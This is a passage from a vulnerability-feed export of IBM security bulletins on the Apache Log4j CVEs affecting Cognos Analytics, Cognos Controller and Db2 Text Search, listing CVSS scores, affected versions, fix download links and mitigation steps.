you will access the Interim Fix via the link under the Bundled Customers.\n\nAffected Version\n\n| \n\nFix Version\n\n| \n\nBundled Customers \n \n---|---|--- \n \nIBM Cognos Analytics 11.2.x\n\n| \n\n[IBM Cognos Analytics 11.2.1 Interim Fix 3](<https://www.ibm.com/support/pages/node/6525670>)\n\n| \n\n[IBM Cognos Analytics 11.2.1 Interim Fix 3 (Bundled)](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm+Information+Management&product=ibm/Information+Management/Cognos+8+Business+Intelligence&release=All&platform=All&function=fixId&fixids=11.2.1-BA-CA-BNDL-IF003:0&includeSupersedes=0&source=fc&login=true&downloadMethod=http&source=fc> \"\" ) \n \nIBM Cognos Analytics 11.1.x\n\n| [IBM Cognos Analytics 11.1.7 Interim Fix 9](<https://www.ibm.com/support/pages/node/6525664> \"\" ) | [IBM Cognos Analytics 11.1.7 Interim Fix 9 (Bundled)](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm+Information+Management&product=ibm/Information+Management/Cognos+8+Business+Intelligence&release=All&platform=All&function=fixId&fixids=11.1.7-BA-CA-BNDL-IF009:0&includeSupersedes=0&source=fc&login=true&downloadMethod=http&source=fc>) \n \nIBM Cognos Analytics 11.0.6 to 11.0.13 FP4\n\n| \n\n[IBM Cognos Analytics 11.0.13 Interim Fix 5](<https://www.ibm.com/support/pages/node/6525666>)\n\n| \n\n[IBM Cognos Analytics 11.0.13 Interim Fix 5 (Bundled)](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm+Information+Management&product=ibm/Information+Management/Cognos+8+Business+Intelligence&release=All&platform=All&function=fixId&fixids=11.0.13-BA-CA-BNDL-IF005:0&includeSupersedes=0&source=fc&login=true&downloadMethod=http&source=fc> \"\" ) \n \nCVE-2021-44228 has been remediated on all IBM Cognos Analytics on Cloud environments.\n\n## Workarounds and Mitigations\n\nThe IBM Cognos Analytics team have developed a \u201cno-upgrade\u201d option for our \u201cOn Prem\u201d (local installation) customers.\n\nThe single version of the patch is applicable to 
IBM Cognos Analytics versions 11.0.6 to 11.0.13 FP4, 11.1.x and 11.2.x. \n\nThe log4jSafeAgent file that is provided for Cognos Analytics modifies the class byte code at the Java startup time. It removes the vulnerable JNDI lookup, and enforces the StrSubstitutor recursion limit without altering the installed product.\n\nIt effectively rewrites the \u201corg/apache/logging/log4j/core/lookup/JndiLookup\u201d class to remove its content during IBM Cognos Analytics start up.\n\nTo get the patch and detailed instructions, click this link: [log4jSafeAgent](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=Cognos&product=ibm/Information+Management/Cognos+Analytics&release=All&platform=All&function=fixId&fixids=11.x-BA-CA-MP-log4jFix&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"<log4jSafeAgent2021>\" ) \n \nBundle Customers can use the following link: [log4jSafeAgent Bundled](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=ibm+Information+Management&product=ibm/Information+Management/Cognos+8+Business+Intelligence&release=All&platform=All&function=fixId&fixids=11.x-BA-CA-BNDL-log4jFix:0&includeSupersedes=0&source=fc&login=true&downloadMethod=http&source=fc> \"<log4jSafeAgent2021 Bundled>\" )\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n[Security Bulletin: IBM Cognos Analytics: Apache Log4j vulnerabilities (CVE-2021-45105, CVE-2021-44832)](<https://www.ibm.com/support/pages/node/6538720> \"Security Bulletin: IBM Cognos Analytics: Apache Log4j vulnerabilities \\(CVE-2021-45105, CVE-2021-44832\\)\" )\n\n## Related Information\n\n[IBM 
Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n20 April 2022 Updated Fix Version links for CA 11.x Bundle Customers to point to latest Interim Fix that addresses Apache log4j vulnerabilities \n13 Jan 2022 Updated Fix Version links for Bundle Customers to point to latest Interim Fixes that address Apache log4j vulnerabilities \n10 Jan 2022: Updated Fix Version titles to reflect updated latest IF version available. Updated the reference to the latest Security Bulletin that supersedes this one. Added more technical context to the Workarounds / Mitigations section and clarified the different links available in the Remediation / Fixes section. \n30 Dec 2021: Fixed link to Security Bulletin link in References section \n30 Dec 2021: Updated Fix Version titles to reflect updated IF version \n21 Dec 2021: Updated Summary and Reference sections re: CVE-2021-45046 \n21 Dec 2021: Modified Mitigation instructions to point to .jar and .pdf \n21 Dec 2021: Added Bundled Customer links to Remediation/Fixes section. \n20 Dec 2021: Added direct link to mitigation instructions to Workarounds / Mitigations section \n16 Dec 2021: Added no-upgrade option to Workarounds / Mitigations section \n15 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSTSF6\",\"label\":\"Cognos Analytics\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"11.2, 11.1, 11.0\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-20T19:30:06", "type": "ibm", "title": "Security Bulletin: IBM Cognos Analytics: Apache Log4j vulnerability (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], 
"modified": "2022-04-20T19:30:06", "id": "40793F706E8E7D40E73D53F66523BA8AE8718C40C00FCEF117CE8DEAC4566FD6", "href": "https://www.ibm.com/support/pages/node/6526474", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:44:42", "description": "## Summary\n\nIBM Cognos Controller is affected by security vulnerabilities. Apache Log4j is used by IBM Cognos Controller as part of its logging infrastructure. This bulletin addresses the exposure to the Apache Log4j vulnerabilities: CVE-2021-45105 and CVE-2021-44832. IBM Cognos Controller has upgraded Apache Log4j to v2.17.1. Please note that this update also addresses CVE-2021-44228 and CVE-2021-45046.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-44832](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. 
\nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Cognos Controller 10.4.2\n\n## Remediation/Fixes\n\nIf you have the listed affected version, it is strongly recommended that you apply the most recent security update:\n\n[Download IBM Cognos Controller 10.4.2 IF17 from Fix Central](<https://www.ibm.com/support/pages/node/6540652> \"Download IBM Cognos Controller 10.4.2 IF17 from Fix Central\" )\n\nPlease note that this update also addresses CVE-2021-44228 and CVE-2021-45046.\n\nRemediation for IBM Cognos Controller on Cloud has completed.\n\n## Workarounds and Mitigations\n\nThe IBM Cognos Controller team developed a \u201cno-upgrade\u201d option for our \u201cOn Prem\u201d (local installation) customers. \n\nTo get the patch and detailed instructions, click this link: [IBM Cognos Controller 10.4.2.0 Apache Log4j Work-around](<https://www-945.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~Information+Management&product=ibm/Information+Management/Cognos+8+Controller&release=All&platform=All&function=fixId&fixids=10.4.2.0-BA-CNTRL-Win64-LOG4J-WORK-AROUND:0&includeSupersedes=0&source=fc&login=true> \"IBM Cognos Controller 10.4.2.0 Apache Log4j Work-around\" )\n\nThe patch is applicable to IBM Cognos Controller version 10.4.2. \n\nThe instructions will guide you to replace the log4j vulnerable files manually without impacting your current product version. 
\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n15 Jan 2022: IBM Cognos Controller on Cloud remediation completion in Remediation/Fixes \n14 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS9S6B\",\"label\":\"Cognos Controller\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"10.4.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": 
"NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-15T20:04:06", "type": "ibm", "title": "Security Bulletin: IBM Cognos Controller 10.4.2 IF17: Apache Log4j vulnerability (CVE-2021-45105 & CVE-2021-44832)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-15T20:04:06", "id": "28932A2B46E12EA86EB64762E53A114C7EAE97254E4818FFBB7E3706DCBD4C0F", "href": "https://www.ibm.com/support/pages/node/6540664", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:37:25", "description": "## Summary\n\nApache Log4j open source library used by IBM\u00ae Db2\u00ae is affected by a vulnerability that could allow a remote attacker to execute arbitrary code on the system. This bulletin covers the vulnerability caused when using versions of log4j earlier than 2.0. This version of the library is used by the ECM (Text Search) feature . CVE-2021-44228 is addressing a critical vulnerability in 2.0 <= log4j <= 2.15.0 covered in a separate security bulletin. 
Please see CVE-2021-44832, CVE-2021-45046, and CVE-2021-45105 for bulletins relating to Log4j V2.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-4104](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4104>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of untrusted data when the attacker has write access to the Log4j configuration. If the deployed application is configured to use JMSAppender, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215048](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215048>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nThe ECM (Text Search Server) feature in all fix pack levels of IBM Db2 V10.5, V11.1, and V11.5 for all server editions on all platforms are affected. \n\nIBM Db2 V10.1 and V9.7 are not affected.\n\nIn the V11.1 release, the Hadoop federation wrapper is also impacted.\n\n## Remediation/Fixes\n\nCustomers running any vulnerable fixpack level of an affected Program, V10.5, v11.1 and V11.5, can download the special build containing the interim fix for this issue from Fix Central. These special builds are available based on the most recent fixpack level for each impacted release: V10.5 FP11, V11.1.4 FP6, V11.5.6, and V11.5.7. 
They can be applied to any affected fixpack level of the appropriate release to remediate this vulnerability.\n\nFor ECM (Text Search Server)\n\n**Release**| **Fixed in fix pack**| **APAR**| **Download URL** \n---|---|---|--- \nV10.5| TBD| [IT39390](<https://www.ibm.com/support/pages/apar/IT39390> \"IT39390\" )| Special Build for V10.5 FP11: \n\n[AIX 64-bit](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41021_DB2-aix64-universal_fixpack-10.5.0.11-FP011%3A316242174097101888&includeSupersedes=0> \"AIX 64-bit\" ) \n[HP-UX 64-bit](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41021_DB2-hpipf64-universal_fixpack-10.5.0.11-FP011%3A242482463941196672&includeSupersedes=0> \"HP-UX 64-bit\" ) \n[Linux 32-bit, x86-32](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_41021_DSClients-linuxia32-client-10.5.0.11-FP011%3A438028792052427520&includeSupersedes=0> \"Linux 32-bit, x86-32\" ) \n[Linux 64-bit, x86-64](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41021_DB2-linuxx64-universal_fixpack-10.5.0.11-FP011%3A577009839975281408&includeSupersedes=0> \"Linux 64-bit, x86-64\" ) \n[Linux 64-bit, POWER\u2122 big endian](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41021_DB2-linuxppc64-universal_fixpack-10.5.0.11-FP011%3A471210663573115712&includeSupersedes=0> \"Linux 
64-bit, POWER\u2122 big endian\" ) \n[Linux 64-bit, POWER\u2122 little endian](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41021_DB2-linuxppc64le-universal_fixpack-10.5.0.11-FP011%3A775057095159355904&includeSupersedes=0> \"Linux 64-bit, POWER\u2122 little endian\" ) \n[Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41021_DB2-linux390x64-universal_fixpack-10.5.0.11-FP011%3A600976767882452608&includeSupersedes=0> \"Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae\" ) \n[Solaris 64-bit, SPARC](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41021_DB2-sun64-universal_fixpack-10.5.0.11-FP011%3A994737637526172160&includeSupersedes=0> \"Solaris 64-bit, SPARC\" ) \n[Solaris 64-bit, x86-64](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41021_DB2-sunamd64-universal_fixpack-10.5.0.11-FP011%3A161651527260272768&includeSupersedes=0> \"Solaris 64-bit, x86-64\" ) \n[Windows 32-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_41021_DSClients-nt32-client-10.5.1100.2866-FP011%3A170657316208346784&includeSupersedes=0> \"Windows 32-bit, x86\" ) \n[Windows 64-bit, 
x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41021_DB2-ntx64-universal_fixpack-10.5.1100.2866-FP011%3A230362976060813344&includeSupersedes=0> \"Windows 64-bit, x86\" ) \n[Inspur](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41021_DB2-inspurkux64-universal_fixpack-10.5.0.11-FP011%3A512422001972300608&includeSupersedes=0> \"Inspur\" ) \n \nV11.1| TBD| [IT39387](<https://www.ibm.com/support/pages/apar/IT39387> \"IT39387\" )| Special Build for V11.1.4 FP6: \n\n[AIX 64-bit](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41025_DB2-aix64-universal_fixpack-11.1.4.6-FP006%3A259848826141273472&includeSupersedes=0> \"AIX 64-bit\" ) \n[Linux 32-bit, x86-32](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_41025_DSClients-linuxia32-client-11.1.4.6-FP006%3A800049365576409728&includeSupersedes=0> \"Linux 32-bit, x86-32\" ) \n[Linux 64-bit, x86-64](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41025_DB2-linuxx64-universal_fixpack-11.1.4.6-FP006%3A973220600195816448&includeSupersedes=0> \"Linux 64-bit, x86-64\" ) \n[Linux 64-bit, POWER\u2122 little 
endian](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41025_DB2-linuxppc64le-universal_fixpack-11.1.4.6-FP006%3A840967649574282368&includeSupersedes=0> \"Linux 64-bit, POWER\u2122 little endian\" ) \n[Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41025_DB2-linux390x64-universal_fixpack-11.1.4.6-FP006%3A914289956995017856&includeSupersedes=0> \"Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae\" ) \n[Solaris 64-bit, SPARC](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41025_DB2-sun64-universal_fixpack-11.1.4.6-FP006%3A248714336279646784&includeSupersedes=0> \"Solaris 64-bit, SPARC\" ) \n[Windows 32-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_41025_DSClients-nt32-client-11.1.4060.1324-FP006%3A435396118409714368&includeSupersedes=0> \"Windows 32-bit, x86\" ) \n[Windows 64-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41025_DB2-ntx64-universal_fixpack-11.1.4060.1324-FP006%3A887641715424039424&includeSupersedes=0> \"Windows 64-bit, x86\" ) \n \nV11.5| TBD| [IT39389](<https://www.ibm.com/support/pages/apar/IT39389> \"IT39389\" )| Special Build for V11.5.6: \n\n[AIX 
64-bit](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13320_134764_DB2-aix64-universal_fixpack-11.5.6.0-FP000%3A759307440669784704&includeSupersedes=0> \"AIX 64-bit\" ) \n[Linux 32-bit, x86-32](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_13320_134766_DSClients-linuxia32-client-11.5.6.0-FP000%3A655540181122919168&includeSupersedes=0> \"Linux 32-bit, x86-32\" ) \n[Linux 64-bit, x86-64](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13320_134765_DB2-linuxx64-universal_fixpack-11.5.6.0-FP000%3A321475938953624576&includeSupersedes=0> \"Linux 64-bit, x86-64\" ) \n[Linux 64-bit, POWER\u2122 little endian](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13320_134763_DB2-linuxppc64le-universal_fixpack-11.5.6.0-FP000%3A676852752763543680&includeSupersedes=0> \"Linux 64-bit, POWER\u2122 little endian\" ) \n[Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13320_134767_DB2-linux390x64-universal_fixpack-11.5.6.0-FP000%3A646964920519258496&includeSupersedes=0> \"Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae\" ) \n[Windows 32-bit, 
x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_13320_134762_DSClients-nt32-client-11.5.6000.1809-FP000%3A830387863039344000&includeSupersedes=0> \"Windows 32-bit, x86\" ) \n[Windows 64-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13320_134761_DB2-ntx64-universal_fixpack-11.5.6000.1809-FP000%3A220578880243028736&includeSupersedes=0> \"Windows 64-bit, x86\" )\n\nNote: The 11.5.6 special builds here are the same ones supplied for resolving CVE-2021-44228 \n \nV11.5| TBD| [IT39389](<https://www.ibm.com/support/pages/apar/IT39389> \"IT39389\" )| Special Build for V11.5.7: \n\n[AIX 64-bit](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13323_134833_DB2-aix64-universal_fixpack-11.5.7.0-FP000%3A479485515202753152&includeSupersedes=0> \"AIX 64-bit\" ) \n[Linux 32-bit, x86-32](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_13323_134832_DSClients-linuxia32-client-11.5.7.0-FP000%3A596706133826041984&includeSupersedes=0> \"Linux 32-bit, x86-32\" ) \n[Linux 64-bit, x86-64](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13323_134831_DB2-linuxx64-universal_fixpack-11.5.7.0-FP000%3A137760201590747536&includeSupersedes=0> \"Linux 64-bit, x86-64\" ) \n[Linux 64-bit, POWER\u2122 little 
endian](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13323_134835_DB2-linuxppc64le-universal_fixpack-11.5.7.0-FP000%3A909787610102068096&includeSupersedes=0> \"Linux 64-bit, POWER\u2122 little endian\" ) \n[Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13323_134834_DB2-linux390x64-universal_fixpack-11.5.7.0-FP000%3A651865390747364992&includeSupersedes=0> \"Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae\" ) \n[Windows 32-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_13323_134829_DSClients-nt32-client-11.5.7000.1973-FP000%3A855115844514252672&includeSupersedes=0> \"Windows 32-bit, x86\" ) \n[Windows 64-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13323_134830_DB2-ntx64-universal_fixpack-11.5.7000.1973-FP000%3A352392631134626240&includeSupersedes=0> \"Windows 64-bit, x86\" )\n\nNote: The 11.5.7 special builds here are the same ones supplied for resolving CVE-2021-44228 \n \nIf you are using Db2 Text Search with rich text filters, after these special builds are applied, you will be required to upgrade your version of rich text filters in addition to Db2 Text search. 
Appropriate rich text filters (in this case version 8.5.5) for each Db2 release can be downloaded from the Db2 accessories suite page.\n\nFor details, see [here](<https://www.ibm.com/support/pages/node/6527760> \"here\" ).\n\nFor Install (Installation Manager)\n\nWe recommend that you download and install the fix found [here](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7ERational&product=ibm/Rational/IBM+Installation+Manager&release=1.9.1.6&platform=Linux&function=all> \"here\" ) to upgrade to the latest version of Installation Manager (IM 1.9.2 or greater).\n\nIt was determined through further investigation that while Installation Manager was found to not be impacted by CVE-2021-4104, as the Installation Manager does not use log4j in a manner that exposes the vulnerability, it does include the older version of the library. \n\nFor v11.1.x, install the Db2 fix listed in the table above for Linux 32-bit, Linux 64-bit, Windows 32-bit and/or Windows 64-bit. This fix replaces the existing log4j jar file with an empty jar file. While the vulnerability is mitigated with this fix, a scan will still show the existence of the jar file. Alternatively you may download and install the fix found [here](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7ERational&product=ibm/Rational/IBM+Installation+Manager&release=1.9.1.6&platform=Linux&function=all> \"here\" ) to upgrade to the latest version of Installation Manager (IM 1.9.2 or greater).\n\nFor earlier versions, we recommend that you download and install the fix found [here](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7ERational&product=ibm/Rational/IBM+Installation+Manager&release=1.9.1.6&platform=Linux&function=all> \"here\" ) to upgrade to the latest version of Installation Manager (IM 1.9.2 or greater).\n\n## Workarounds and Mitigations\n\nFor ECM (Text Search): \n\n\nThe 